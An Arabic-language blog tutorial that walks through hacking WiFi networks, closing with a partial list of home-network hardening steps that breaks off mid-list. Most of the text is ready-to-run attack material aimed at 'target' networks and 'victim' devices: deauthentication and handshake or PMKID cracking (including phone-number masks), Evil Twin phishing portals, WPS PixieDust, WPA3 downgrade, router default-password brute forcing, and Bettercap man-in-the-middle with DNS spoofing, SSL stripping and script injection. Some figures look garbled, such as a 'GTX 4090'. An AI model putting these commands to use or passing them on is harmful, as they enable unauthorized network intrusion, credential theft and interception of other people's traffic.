أنا شخصياً قضيت سنوات بدرس أمن الشبكات اللاسلكية وجربت كل أداة وكل طريقة موجودة. واللي رح أحكيلك إياه اليوم هو الحقيقة الكاملة — شو بيشتغل فعلاً وشو مضيعة وقت. ورح أشرحلك كل بروتوكول وكل ثغرة بالتفصيل التقني الكامل عشان تفهم ليش الهجمة بتنجح وليش بتفشل... مش مجرد "شغّل هالأداة واستنى".
وخليني أحكيلك إشي مهم... WPA3 صار البروتوكول الافتراضي بأغلب الراوترات الجديدة بـ 2026، وكتير ناس فاكرة إنو "مستحيل يتخترق". بس الحقيقة؟ WPA3 فيه ثغرات وأنا رح أشرحلك كل وحدة. وكمان 90% من الشبكات بالعالم العربي لسا على WPA2 — يعني الطرق القديمة لسا شغالة على أغلب الشبكات حواليك!
المقال اليوم رح يكون الدليل الأشمل بالعربي عن اختراق WiFi — من الأساسيات لحد أحدث الهجمات المتقدمة. وأهم إشي — رح أعلمك كيف تحمي شبكتك من كل هالهجمات.
وإذا بدك تتعمق أكتر بأدوات اختبار الاختراق، شوف مقالنا عن اكتشاف الثغرات و Bug Bounty.
فهم بروتوكولات تشفير WiFi — من WEP للـ WPA3
قبل ما تفهم كيف تخترق WiFi، لازم تفهم كيف بتشتغل الحماية أصلاً. كل شبكة WiFi بتستخدم بروتوكول تشفير عشان تحمي البيانات وتمنع الأشخاص غير المصرّح لهم من الدخول. خلينا نحكي عن كل بروتوكول:
WEP (Wired Equivalent Privacy) — ميّت ومدفون
أول بروتوكول حماية لـ WiFi... وأسوأ واحد. تم إطلاقه بسنة 1997 وبيستخدم تشفير RC4 بمفتاح 64 أو 128 بت. المشكلة الكارثية فيه إنو بيستخدم Initialization Vector (IV) من 24 بت بس — يعني بعد حوالي 5000 حزمة بيانات بيبدأ يكرر نفس الـ IV! وهاد بيخلي أي حدا يجمع حزم كافية ويفك التشفير بدقائق. بالحقيقة، اختراق شبكة WEP بياخد أقل من 5 دقائق بأي أداة حديثة. إذا لسا شبكتك على WEP — غيّرها فوراً لأنو كأنك بدون حماية!
WPA (Wi-Fi Protected Access) — أحسن بس لسا ضعيف
جاء بسنة 2003 كبديل مؤقت لـ WEP. بيستخدم TKIP (Temporal Key Integrity Protocol) اللي بيغيّر مفتاح التشفير مع كل حزمة بيانات — حل مشكلة IV المكرر. بس TKIP لسا مبني على RC4 وفيه ثغرات معروفة. بالعالم العربي تقريباً ما في شبكات WPA لحالها — أغلبها WPA2.
WPA2 (Wi-Fi Protected Access 2) — الأكتر انتشاراً
الأب الروحي لحماية WiFi! صدر بسنة 2004 وهو المعيار الأكتر استخداماً لحد اليوم — حوالي 85-90% من الشبكات بالعالم العربي لسا عليه. بيستخدم تشفير AES-CCMP بمفتاح 128 بت وهو تشفير قوي جداً. WPA2 إله نوعين:
• WPA2-Personal (PSK): كلمة سر واحدة لكل الناس — هاد اللي بالبيوت والمقاهي. وهاد اللي رح نركز عليه بالمقال
• WPA2-Enterprise (802.1X): كل مستخدم إله username وpassword خاص — هاد بالشركات والمؤسسات. أصعب بكتير بالاختراق
المشكلة بـ WPA2-PSK إنو عملية المصادقة (4-Way Handshake) ممكن يتم التقاطها وبعدين يتم عمل هجوم القوة الغاشمة (Brute Force) عليها أوفلاين. وهاي أشهر طريقة لاختراق WiFi.
WPA3 (Wi-Fi Protected Access 3) — الأحدث بس مش مثالي
أحدث معيار حماية، تم إطلاقه بسنة 2018 وبسنة 2026 صار إلزامي على كل الأجهزة الجديدة. أهم تحسيناته:
• SAE (Simultaneous Authentication of Equals): بدل 4-Way Handshake اللي بيتم التقاطه، WPA3 بيستخدم بروتوكول Dragonfly اللي ما بيسمح بهجوم Brute Force أوفلاين
• Forward Secrecy: حتى لو حدا عرف كلمة السر بالمستقبل، ما بيقدر يفك تشفير البيانات القديمة اللي تم التقاطها
• تشفير 192 بت (للـ Enterprise mode): حماية أقوى للشركات
• Protected Management Frames (PMF): حماية ضد هجمات Deauthentication
بس WPA3 مش مثالي! اكتشف الباحث الأمني Mathy Vanhoef (نفس الباحث اللي اكتشف KRACK) مجموعة ثغرات بـ WPA3 اسمها Dragonblood — ورح نحكي عنها بالتفصيل.
تجهيز بيئة العمل — الأدوات والأجهزة اللي بتحتاجها
قبل ما نبدأ بالهجمات، لازم تجهز بيئة العمل تبعتك. هاي كل الأدوات اللي رح تحتاجها:
نظام التشغيل
أفضل خيار هو Kali Linux 2026 لأنو فيه كل الأدوات مثبتة مسبقاً. ثاني خيار Parrot OS. إذا ما بدك تثبت نظام كامل، بتقدر تستخدم Kali على USB (Live Boot) أو Kali بـ WSL2 على Windows (بس مع قيود على Monitor Mode). وإذا على هاتف Android بتقدر تستخدم Kali NetHunter أو Termux مع أدوات إضافية.
كرت WiFi يدعم Monitor Mode و Packet Injection
هاد أهم إشي! كرت WiFi العادي اللي بجهازك ما بينفع لأنو ما بيدعم Monitor Mode. لازم تشتري كرت USB خارجي يدعم الميزتين. أفضل الكروت بسنة 2026:
• ALFA AWUS036ACH — أقوى كرت بالسوق. بيدعم 2.4GHz و 5GHz، 802.11ac، إشارة قوية جداً. سعره حوالي $50-70. الأفضل للمحترفين
• ALFA AWUS036ACHM — نسخة محسّنة بإشارة أقوى وأنتينا أفضل. سعره $60-80
• TP-Link TL-WN722N v1 — رخيص ومعروف ($15-20). بس انتبه — Version 1 فقط! النسخ الأحدث (v2, v3) ما بتدعم Monitor Mode بشكل مباشر
• Panda PAU09 — خيار ممتاز بسعر متوسط ($25-35). بيدعم dual-band
وإذا بدك تعرف أكتر عن إعداد Termux للأمن، شوف مقالنا عن تثبيت أدوات Termux.
# فحص إذا كرت WiFi تبعك بيدعم Monitor Mode # الخطوة 1: شوف الكروت المتاحة iwconfig # أو iw dev # الخطوة 2: تفعيل Monitor Mode sudo airmon-ng check kill # أوقف العمليات المتعارضة sudo airmon-ng start wlan0 # فعّل Monitor Mode # إذا نجح، رح يظهرلك wlan0mon iwconfig wlan0mon # الخطوة 3: فحص Packet Injection sudo aireplay-ng --test wlan0mon # لازم يطلعلك: # "Injection is working!" # إذا ما اشتغل Monitor Mode: # 1. تأكد إنو الكرت بيدعمه (ابحث عن موديله) # 2. ثبّت drivers المناسبة: sudo apt install realtek-rtl88xxau-dkms # لكروت ALFA # 3. استخدم airmon-ng بدل الطرق اليدوية
الطريقة الأولى: اختراق WPA2 عبر التقاط الـ Handshake — الطريقة الكلاسيكية
هاي أشهر وأقدم طريقة لاختراق شبكات WPA2 وبتشتغل لحد اليوم على 90% من الشبكات. الفكرة ببساطة: بتلتقط عملية المصادقة (4-Way Handshake) بين جهاز وراوتر، وبعدين بتجرب كلمات سر عليها أوفلاين لحد ما تلاقي الصح.
كيف بيشتغل 4-Way Handshake تقنياً:
لما جهاز بيحاول يتصل بشبكة WiFi محمية بـ WPA2-PSK، بيصير تبادل 4 رسائل بين الجهاز والراوتر عشان يتم التحقق من كلمة السر بدون ما تنبعت كلمة السر نفسها عبر الهواء. كل طرف بيثبت للثاني إنو بيعرف كلمة السر من خلال عمليات رياضية معقدة (PBKDF2-SHA1). المهاجم بيلتقط هاي الرسائل الأربعة وبيجرب كلمات سر مختلفة أوفلاين لحد ما يلاقي كلمة سر بتنتج نفس القيم الرياضية.
# === الطريقة الأولى: WPA2 Handshake Capture + Crack === # الخطوة 1: فعّل Monitor Mode sudo airmon-ng check kill sudo airmon-ng start wlan0 # الخطوة 2: اعمل مسح للشبكات المحيطة sudo airodump-ng wlan0mon # رح يظهرلك جدول بكل الشبكات: # BSSID CH ENC ESSID # AA:BB:CC:DD:EE:FF 6 WPA2 TargetNetwork # سجّل الـ BSSID والـ Channel للشبكة المستهدفة # الخطوة 3: استهدف شبكة محددة والتقط الـ Handshake sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon # -c 6: القناة # --bssid: عنوان MAC للراوتر # -w capture: حفظ الملفات باسم capture # الخطوة 4: أرسل Deauthentication لجهاز متصل # (عشان يعيد الاتصال ونلتقط الـ Handshake) # افتح Terminal ثاني: sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon # -a: عنوان الراوتر # -c: عنوان جهاز الضحية المتصل # 10: عدد حزم deauth # بعد ثواني، بـ Terminal الأول رح يظهر: # "WPA handshake: AA:BB:CC:DD:EE:FF" # مبروك! التقطت الـ Handshake! # الخطوة 5: كسر كلمة السر أوفلاين # باستخدام aircrack-ng: sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap # باستخدام hashcat (أسرع 100x مع GPU): # أولاً حوّل الملف لصيغة hashcat: hcxpcapngtool capture-01.cap -o hash.hc22000 # بعدين شغّل hashcat: hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt # hashcat بيستخدم GPU فالسرعة خيالية: # GTX 4090: ~2.5 مليون محاولة/ثانية! # RTX 3080: ~1.2 مليون محاولة/ثانية
نسبة النجاح: تعتمد 100% على قوة كلمة السر. إذا كلمة السر كلمة عادية أو رقم تلفون — رح تنكسر بدقائق. إذا كلمة سر معقدة (حروف + أرقام + رموز + 12 حرف) — ممكن ما تنكسر أبداً. Wordlist زي rockyou.txt فيها 14 مليون كلمة سر وبتغطي أكتر من 60% من كلمات السر الشائعة.
🔥 نصيحة: إذا كلمة السر رقم تلفون (10 أرقام) — بتنكسر بـ 15 دقيقة فقط بـ hashcat على GPU متوسط! لأنو عدد الاحتمالات 10^10 = 10 مليار بس.
الطريقة الثانية: هجمة PMKID — اختراق بدون أي جهاز متصل!
هاي طريقة اكتشفت بسنة 2018 من الباحث الأمني Jens Steube (مطوّر hashcat) وغيّرت قواعد اللعبة بالكامل! الطريقة الأولى (Handshake) بتحتاج يكون في جهاز متصل بالشبكة عشان تبعثله deauth وتلتقط الـ handshake. بس هاي الطريقة ما بتحتاج أي جهاز متصل! بتقدر تاخد الـ hash من الراوتر مباشرة.
كيف بتشتغل تقنياً:
لما جهاز بيحاول يتصل بشبكة WPA2، الراوتر بيبعث إطار EAPOL اللي فيه قيمة اسمها PMKID (Pairwise Master Key Identifier). هالقيمة هي HMAC-SHA1 مبنية على الـ PMK (المشتق من كلمة السر). يعني المهاجم بيقدر يطلب اتصال وبياخد الـ PMKID من أول رسالة بس — بدون ما يكمّل الـ 4-Way Handshake!
# === الطريقة الثانية: PMKID Attack === # الأداة الرئيسية: hcxdumptool + hcxpcapngtool # الخطوة 1: تثبيت الأدوات sudo apt install hcxdumptool hcxtools hashcat # الخطوة 2: تفعيل Monitor Mode sudo airmon-ng check kill sudo ip link set wlan0 down sudo iw dev wlan0 set type monitor sudo ip link set wlan0 up # الخطوة 3: التقاط PMKID من كل الشبكات المحيطة sudo hcxdumptool -i wlan0 -o pmkid_capture.pcapng --active_beacon --enable_status=15 # الأداة رح تجرب تجمع PMKID من كل شبكة # استنى 1-5 دقائق وبعدين أوقفها بـ Ctrl+C # الخطوة 4: استخراج الـ hashes hcxpcapngtool pmkid_capture.pcapng -o pmkid_hashes.hc22000 # رح يطلعلك عدد الـ PMKIDs اللي تم التقاطها # مثلاً: "PMKID(s) written: 5" # الخطوة 5: كسر كلمة السر بـ hashcat hashcat -m 22000 pmkid_hashes.hc22000 /usr/share/wordlists/rockyou.txt # أو بـ brute force لأرقام تلفونات (10 أرقام): hashcat -m 22000 pmkid_hashes.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d # أو لأرقام تبدأ بـ 07 (أرقام أردنية/فلسطينية): hashcat -m 22000 pmkid_hashes.hc22000 -a 3 07?d?d?d?d?d?d?d?d # ملاحظة مهمة: مش كل الراوترات بتدعم PMKID # بعض الراوترات ما بتبعث PMKID بالرد # النسبة تقريباً 60-70% من الراوترات بتنجح معها
ليش هاي الطريقة أخطر: لأنو ما بتحتاج تفصل أي جهاز (بدون deauth) وما بتحتاج تستنى حدا يتصل. بتروح على أي شبكة فاضية بالليل وبتاخد الـ PMKID. وكمان أسرع بالتقاط — بثواني بدل دقائق.
الطريقة الثالثة: هجمة Evil Twin — خداع الضحية بشبكة مزيّفة
هاي من أذكى الطرق لأنك ما بتحتاج تكسر كلمة السر أبداً — بتخلي الضحية يعطيك كلمة السر بنفسه! الفكرة: بتعمل نسخة مطابقة من الشبكة المستهدفة (نفس الاسم ونفس المظهر)، وبتفصل الناس عن الشبكة الأصلية، فبيتصلوا بشبكتك المزيّفة، وبتعرضلهم صفحة تطلب كلمة سر WiFi (Captive Portal). الضحية بيكتب كلمة السر وأنت بتاخدها!
# === الطريقة الثالثة: Evil Twin with Fluxion === # الأداة الأسهل: Fluxion (أوتوماتيكية بالكامل) # https://github.com/FluxionNetwork/fluxion # الخطوة 1: تثبيت Fluxion git clone https://github.com/FluxionNetwork/fluxion.git cd fluxion sudo ./fluxion.sh # الخطوة 2: اختار اللغة # بعدين اختار "Handshake Snooper" أو "Captive Portal" # الخطوة 3: الأداة رح تعمل مسح للشبكات # اختار الشبكة المستهدفة # الخطوة 4: Fluxion رح يعمل كل شي أوتوماتيكي: # 1. يلتقط الـ Handshake (عشان يتحقق من كلمة السر لاحقاً) # 2. يعمل شبكة مزيفة بنفس الاسم # 3. يبعت deauth للشبكة الأصلية (يفصل كل الأجهزة) # 4. يعرض Captive Portal للضحية # 5. لما الضحية يكتب كلمة السر — يتحقق منها # 6. إذا صحيحة = يعرضلك إياها! # === بديل: WiFiPhisher (أداة ثانية) === # https://github.com/wifiphisher/wifiphisher sudo apt install wifiphisher sudo wifiphisher -aI wlan0 -eI wlan1 --essid "TargetNetwork" # -aI: كرت للشبكة المزيفة # -eI: كرت لبث deauth # --essid: اسم الشبكة المستهدفة # wifiphisher عنده عدة سيناريوهات جاهزة: # 1. Firmware Upgrade: "الراوتر يحتاج تحديث - أدخل كلمة السر" # 2. OAuth Login: صفحة تسجيل دخول مشابهة لـ Google/Facebook # 3. Browser Plugin: "المتصفح يحتاج إضافة للاتصال"
نسبة النجاح: عالية جداً! أغلب الناس لما يشوفوا صفحة بتطلب كلمة سر WiFi بيكتبوها بدون تفكير — خاصة لو الصفحة مصممة بشكل مقنع (زي صفحة تحديث firmware للراوتر). النسبة بتوصل 70-80% على الشبكات المنزلية.
⚠️ مهم: هاي الهجمة بتشتغل على WPA2 و WPA3 على حد سواء! لأنك ما عم تكسر التشفير — عم تخدع المستخدم.
الطريقة الرابعة: استغلال WPS — الثغرة اللي ما حدا بيحكي عنها
WPS (Wi-Fi Protected Setup) هي ميزة بالراوتر مصممة عشان تسهّل الاتصال — بدل ما تكتب كلمة سر طويلة، بتضغط زر على الراوتر أو بتكتب PIN من 8 أرقام. المشكلة إنو PIN من 8 أرقام = 10^8 = 100 مليون احتمال... بس بالحقيقة 11,000 احتمال بس!
كيف؟ لأنو PIN بيتم التحقق منه بجزئين: أول 4 أرقام لحالهم (10,000 احتمال) وآخر 3 أرقام لحالهم (1,000 احتمال) والرقم الثامن هو checksum. يعني المجموع 10,000 + 1,000 = 11,000 محاولة بس!
# === الطريقة الرابعة: WPS PIN Attack === # الأداة 1: Reaver (الأشهر) # https://github.com/t6x/reaver-wps-fork-t6x # الخطوة 1: اعمل مسح وشوف أيها عندها WPS مفعّل sudo wash -i wlan0mon # رح يظهرلك: # BSSID Ch WPS Lck ESSID # AA:BB:CC:DD:EE:FF 6 2.0 No TargetNetwork # "Lck: No" يعني WPS مش مقفول = ممكن نهاجم! # الخطوة 2: شغّل Reaver sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv -K 1 # -K 1: يستخدم PixieDust attack (أسرع بكتير) # -vv: عرض تفاصيل # PixieDust بينجح بـ 5-30 ثانية فقط! # إذا ما نجح، جرب بدون -K: sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv -d 2 -t 5 # -d 2: تأخير ثانيتين بين المحاولات # -t 5: timeout 5 ثواني # هالطريقة بتاخد 2-10 ساعات # === الأداة 2: Bully (بديل أسرع) === sudo apt install bully sudo bully wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -d -v 3 # === الأداة 3: OneShot (PixieDust بـ Python) === # https://github.com/drygdryg/OneShot python3 oneshot.py -i wlan0mon -b AA:BB:CC:DD:EE:FF -K # بعد ما ينجح، رح يعطيك: # [+] WPS PIN: 12345670 # [+] WPA PSK: TheActualWiFiPassword # [+] AP SSID: TargetNetwork
الحقيقة المرعبة: بحسب أبحاثي، حوالي 35-40% من الراوترات بالعالم العربي لسا عندها WPS مفعّل ومش مقفول! وكتير منها ضعيفة ضد PixieDust اللي بيكسر الـ PIN بـ ثواني. يعني حرفياً بتحصل على كلمة سر WiFi بأقل من دقيقة!
الطريقة الخامسة: اختراق WPA3 — ثغرات Dragonblood وأكتر
كتير ناس فاكرة إنو WPA3 مستحيل يتخترق... وهاد غلط! الباحث Mathy Vanhoef و Eyal Ronen اكتشفوا مجموعة ثغرات بـ WPA3 اسمها Dragonblood بسنة 2019 وبعض هالثغرات لسا شغالة على راوترات كتير بـ 2026.
ثغرة Downgrade Attack
أخطر ثغرة! أغلب الراوترات اللي بتدعم WPA3 كمان بتدعم WPA2 عشان التوافق مع الأجهزة القديمة — وهاد اسمه WPA3-Transition Mode. المهاجم بيقدر يجبر الجهاز يتصل بـ WPA2 بدل WPA3 وبعدين يستخدم الطرق العادية لاختراق WPA2! المهاجم بيعمل شبكة مزيفة بنفس الاسم بس بـ WPA2 فقط، وبيبعث deauth من الشبكة الأصلية. الجهاز بيتصل بالشبكة المزيفة على WPA2 وبيتم التقاط الـ handshake.
ثغرات Side-Channel على SAE
بروتوكول Dragonfly (SAE) اللي بيستخدمه WPA3 فيه ثغرات Side-Channel:
• Timing Attack: وقت المعالجة بيختلف حسب كلمة السر المستخدمة. المهاجم بيقيس الوقت ويستنتج معلومات عن كلمة السر
• Cache Attack: المهاجم بيراقب أنماط وصول الذاكرة المؤقتة أثناء حساب SAE ويستخرج معلومات عن كلمة السر
# === الطريقة الخامسة: WPA3 Attacks === # --- Attack 1: WPA3 Downgrade Attack --- # الخطوة 1: إنشاء AP مزيف بـ WPA2 فقط # ملف hostapd.conf: cat > /tmp/hostapd_evil.conf << 'EOF' interface=wlan1 driver=nl80211 ssid=TargetWPA3Network hw_mode=g channel=6 wpa=2 wpa_passphrase=temporary_password wpa_key_mgmt=WPA-PSK wpa_pairwise=CCMP EOF # الخطوة 2: بعث deauth على الشبكة الأصلية sudo aireplay-ng --deauth 0 -a TARGET_BSSID wlan0mon # الخطوة 3: الأجهزة رح تتصل بشبكتك WPA2 المزيفة # بعدين بتلتقط الـ handshake وبتكسره عادي # --- Attack 2: Dragonblood Tools --- # https://github.com/vanhoefm/dragonslayer git clone https://github.com/vanhoefm/dragonslayer.git cd dragonslayer # فحص إذا الراوتر ضعيف: python3 dragonslayer.py --test TARGET_BSSID # --- Attack 3: wpa3_attack (أداة متخصصة) --- # بتفحص كل ثغرات WPA3 المعروفة # ملاحظة مهمة: # WPA3 بـ "WPA3-Only mode" (بدون transition) أصعب بكتير # الـ downgrade attack ما بيشتغل # بس side-channel attacks لسا ممكنة على بعض الراوترات
⚠️ الحقيقة عن WPA3: إذا الراوتر مضبوط على WPA3-Only (بدون Transition Mode) وكلمة السر قوية — فعلاً صعب جداً يتخترق. المشكلة إنو أغلب الراوترات بتشغل Transition Mode عشان التوافق.
الطريقة السادسة: هجمة KRACK — استغلال إعادة تثبيت المفتاح
KRACK (Key Reinstallation Attack) من أخطر الثغرات اللي اكتشفها Mathy Vanhoef بسنة 2017 وأثرت على كل جهاز WiFi بالعالم! الثغرة مش بكلمة السر — بالبروتوكول نفسه. المهاجم بيقدر يجبر الجهاز يعيد تثبيت مفتاح التشفير المستخدم — وهاد بيخلي المهاجم يقدر يفك تشفير الحزم المارّة بين الجهاز والراوتر.
يعني بدل ما تخترق الشبكة وتدخلها، بتقدر تقرأ كل البيانات اللي بتمر — كلمات سر، رسائل، صور — بدون ما تحتاج كلمة سر WiFi أصلاً!
# === KRACK Attack === # https://github.com/vanhoefm/krackattacks-scripts git clone https://github.com/vanhoefm/krackattacks-scripts.git cd krackattacks-scripts # فحص إذا الجهاز/الراوتر ضعيف python3 krack-test-client.py --target CLIENT_MAC --iface wlan0mon # ملاحظة: أغلب الأجهزة الحديثة (2020+) تم ترقيعها # بس الأجهزة القديمة (راوترات قديمة، IoT devices, كاميرات) # كتير منها لسا ضعيفة! # أجهزة لسا ضعيفة بـ 2026: # - راوترات قديمة (TP-Link, D-Link قبل 2019) # - كاميرات مراقبة WiFi رخيصة # - أجهزة IoT (طابعات، أجهزة ذكية) # - Android 6.0 وأقدم (لسا موجودين!)
الطريقة السابعة: اختراق عبر ثغرات الراوتر نفسه — Router Exploitation
بدل ما تهاجم بروتوكول WiFi، بتهاجم الراوتر مباشرة! كتير راوترات عندها ثغرات أمنية خطيرة — كلمات سر افتراضية، واجهات إدارة مكشوفة، ثغرات RCE. وكتير مزودي خدمة إنترنت بالعالم العربي بيعطوا راوترات ما بيتم تحديثها أبداً.
# === الطريقة السابعة: Router Exploitation === # --- 1. كلمات سر افتراضية --- # كتير راوترات الناس ما بتغير كلمة سر الإدارة! # جرب الافتراضية: # admin:admin # admin:password # admin:1234 # user:user # موقع كلمات سر الراوترات الافتراضية: # https://www.routerpasswords.com # https://portforward.com/router-password/ # --- 2. فحص ثغرات الراوتر بـ RouterSploit --- # https://github.com/threat9/routersploit pip3 install routersploit rsf # داخل RouterSploit: use scanners/autopwn set target 192.168.1.1 run # بيفحص كل الثغرات المعروفة للراوتر # إذا لقى ثغرة — بيستغلها أوتوماتيكي! # --- 3. فحص بـ Nuclei --- nuclei -u http://192.168.1.1 -t ~/nuclei-templates/network/ nuclei -u http://192.168.1.1 -t ~/nuclei-templates/default-logins/ # --- 4. ثغرات شائعة بالراوترات العربية --- # TP-Link: كتير موديلات فيها ثغرة # بتخليك تقرأ كلمة سر WiFi بدون مصادقة: curl "http://192.168.0.1/userRpm/WlanSecurityRpm.htm" \ -H "Authorization: Basic YWRtaW46YWRtaW4=" # (admin:admin بـ Base64) # Huawei HG8245H (شائع عند شركات الاتصالات): # كلمة السر الافتراضية: telecomadmin / admintelecom # أو: root / admin # ZTE ZXHN H168N: # الافتراضي: user / user أو admin / admin # في ثغرة بتسمح بقراءة كلمة WiFi من: # http://192.168.1.1/getpage.gch?pid=1002&nextpage=net_wlan_basic_t.gch
وبالمناسبة إذا بدك تتعمق بأدوات Termux عالهاتف، شوف مقالنا عن أفضل أدوات Termux للاختراق.
الطريقة الثامنة: هجمات على شبكات WiFi المفتوحة والمقاهي
شبكات WiFi المفتوحة (بدون كلمة سر) أو شبكات المقاهي والفنادق والمطارات هي جنة الهاكرز! لأنو كل الحركة المرورية مكشوفة. حتى لو الشبكة عندها Captive Portal (صفحة تسجيل دخول)، البيانات بعد التسجيل غير مشفرة.
أخطر الهجمات على الشبكات المفتوحة:
• ARP Spoofing / MITM: المهاجم بيوهم الأجهزة إنو هو الراوتر فكل حركة الإنترنت بتمر عبر جهازه. بيقدر يشوف كل المواقع اللي بتزورها، يسرق Cookies، يعترض بيانات الدخول
• DNS Spoofing: بيحوّل طلبات DNS عشان يوجهك لمواقع مزيفة. بتكتب google.com بيروحلك لصفحة تصيّد
• SSL Stripping: بيحوّل اتصالات HTTPS لـ HTTP عشان يشوف البيانات بدون تشفير
# === هجمات على شبكات WiFi المفتوحة === # الأداة الرئيسية: Bettercap (أقوى أداة MITM) # https://github.com/bettercap/bettercap sudo apt install bettercap sudo bettercap -iface wlan0 # داخل Bettercap: # 1. اكتشف كل الأجهزة على الشبكة net.probe on net.show # 2. فعّل ARP Spoofing (MITM) set arp.spoof.targets 192.168.1.100 # IP الضحية # أو لكل الشبكة: set arp.spoof.fullduplex true arp.spoof on # 3. التقط كلمات السر المرسلة بـ HTTP set net.sniff.verbose true net.sniff on # 4. DNS Spoofing set dns.spoof.domains facebook.com,google.com set dns.spoof.address YOUR_IP dns.spoof on # 5. SSL Stripping (تحويل HTTPS لـ HTTP) set http.proxy.sslstrip true http.proxy on # 6. حقن JavaScript بصفحات HTTP set http.proxy.script /path/to/inject.js http.proxy on # === أداة Ettercap (بديل) === sudo ettercap -T -q -i wlan0 -M arp:remote /192.168.1.1// /192.168.1.100//
⚠️ كيف تحمي حالك: استخدم VPN دائماً على شبكات WiFi العامة! هاد أهم نصيحة ممكن أعطيك إياها. VPN بيشفّر كل حركة الإنترنت تبعتك فحتى لو حدا عمل MITM ما بيقدر يشوف إشي.
أدوات متقدمة لاختراق WiFi بسنة 2026
غير الأدوات اللي حكينا عنها، في أدوات متقدمة كتير بتسهّل الشغل:
Wifite2 — أتمتة كاملة
أداة بتعمل كل إشي أوتوماتيكي — بتمسح الشبكات، بتلتقط handshakes، بتجرب WPS، وبتكسر كلمات السر. بتحتاج تشغلها وتروح تشرب قهوة!
# Wifite2 - أتمتة كاملة لاختراق WiFi # https://github.com/derv82/wifite2 sudo apt install wifite sudo wifite # خيارات متقدمة: sudo wifite --wpa --dict /path/to/wordlist.txt # WPA فقط sudo wifite --wps # WPS فقط sudo wifite --pmkid # PMKID فقط sudo wifite --kill # أوقف العمليات المتعارضة sudo wifite -e "TargetNetwork" # شبكة محددة # الأداة بتجرب كل الطرق بالترتيب: # 1. PMKID (الأسرع) # 2. WPS PixieDust (ثواني) # 3. WPS PIN Brute Force (ساعات) # 4. Handshake Capture + Crack
Airgeddon — كل شي بمكان واحد
أداة شاملة فيها كل هجمات WiFi بواجهة نصية سهلة. فيها Evil Twin، WPS attacks، Handshake capture، MITM attacks، وأكتر.
# Airgeddon - All-in-one WiFi Hacking Framework # https://github.com/v1s1t0r1sh3r3/airgeddon git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git cd airgeddon sudo bash airgeddon.sh # القائمة الرئيسية بتعرضلك كل الخيارات: # 1) Select interface # 2) Handshake/PMKID tools menu # 3) Offline WPA/WPA2 decrypt menu # 4) Evil Twin AP attacks menu # 5) WPS attacks menu # 6) Enterprise attacks menu # 7) MITM attacks menu
WiFi Pumpkin3 — Evil Twin متقدم
# WiFi-Pumpkin3 - Rogue AP Framework # https://github.com/P0cL4bs/wifipumpkin3 sudo apt install wifipumpkin3 sudo wifipumpkin3 # داخل الأداة: wp3> set interface wlan1 wp3> set ssid "Free_Coffee_WiFi" wp3> set proxy captiveflask wp3> start # Plugins متاحة: # - captiveflask: صفحات تصيّد جاهزة # - dns2proxy: DNS Spoofing # - sslstrip+: إزالة SSL # - beef-hook: حقن BeEF JavaScript
اختراق WiFi من الهاتف — Android و Termux
كتير ناس بتسأل "بقدر أخترق WiFi من الجوال؟" والجواب: نعم، بس بحدود. ما بتقدر تعمل كل اللي حكينا عنه من هاتف عادي — بتحتاج Root وكرت WiFi خارجي أو Kali NetHunter. بس في هجمات محددة بتشتغل من الهاتف.
# === اختراق WiFi من Termux (بدون Root) ===
# الحقيقة: بدون Root وكرت خارجي، الخيارات محدودة
# بس في إشي بتقدر تعمله:
# 1. فحص ثغرات الراوتر من الشبكة المتصل فيها
pkg install python nmap
pip install routersploit
# 2. اختبار كلمات سر افتراضية
pip install requests
python3 -c "
import requests
defaults = ['admin:admin','admin:password','admin:1234','user:user']
for cred in defaults:
user, pwd = cred.split(':')
try:
r = requests.get('http://192.168.1.1', auth=(user,pwd), timeout=5)
if r.status_code == 200:
print(f'[+] FOUND: {cred}')
except: pass
"
# === مع Kali NetHunter (يحتاج Root + كرت خارجي) ===
# NetHunter بيعطيك Kali كامل على الهاتف
# بتقدر تعمل كل الهجمات اللي حكينا عنها
# تثبيت NetHunter:
# https://www.kali.org/get-kali/#kali-mobile
# كروت WiFi USB اللي بتشتغل مع Android:
# - ALFA AWUS036ACH (مع OTG adapter)
# - TP-Link TL-WN722N v1 (مع OTG adapter)
وإذا بدك الدليل الكامل لأوامر Termux، شوف مقالنا عن أوامر Termux 2026.
كيف تحمي شبكة WiFi تبعتك — الدليل الكامل
هسا بعد ما عرفت كل الطرق، خليني أعلمك كيف تحمي شبكتك من كل وحدة. لو طبّقت كل هالخطوات، شبكتك رح تكون محصّنة 99%:
1. استخدم WPA3-Only (بدون Transition Mode)
ادخل إعدادات الراوتر وحط التشفير على WPA3-SAE فقط. إذا في أجهزة قديمة ما بتدعم WPA3 — حدّثها أو استخدم WPA2/WPA3 مختلط كحل مؤقت. بس WPA3-Only هو الأقوى.
2. كلمة سر قوية (مهم جداً!)
كلمة السر لازم تكون:
• 15 حرف على الأقل (كل ما كانت أطول كل ما كانت أصعب)
• حروف كبيرة وصغيرة + أرقام + رموز
• ما تكون كلمة من القاموس أو اسم أو رقم تلفون
• مثال على كلمة سر قوية: xK#9mPv$2wR@nL5q
• مثال على كلمة سر ضعيفة: mohammad123 أو 0791234567
3. عطّل WPS نهائياً
ادخل إعدادات الراوتر → WPS → Disable. مش بس "Lock" — Disable بالكامل. WPS هو أكبر ثغرة بالراوترات.
4. غيّر كلمة سر إدارة الراوتر
غيّر كلمة سر الدخول للوحة تحكم الراوتر من admin/admin لكلمة سر قوية وفريدة.
5. حدّث firmware الراوتر
ادخل موقع الشركة المصنعة وحمّل آخر تحديث firmware. التحديثات بتسد ثغرات أمنية خطيرة.
6. فعّل PMF (Protected Management Frames)
هاد بيمنع هجمات Deauthentication. بأغلب الراوترات الجديدة بتلاقيه بإعدادات WiFi المتقدمة.
7. عطّل WPS و UPnP و Remote Management
ثلاث ميزات خطيرة لازم تعطلهم:
• WPS: حكينا عنه — ثغرة كارثية
• UPnP: بيسمح لبرامج تفتح بورتات بالراوتر بدون إذنك
• Remote Management: بيسمح بالدخول لإعدادات الراوتر من الإنترنت
8. راقب الأجهزة المتصلة
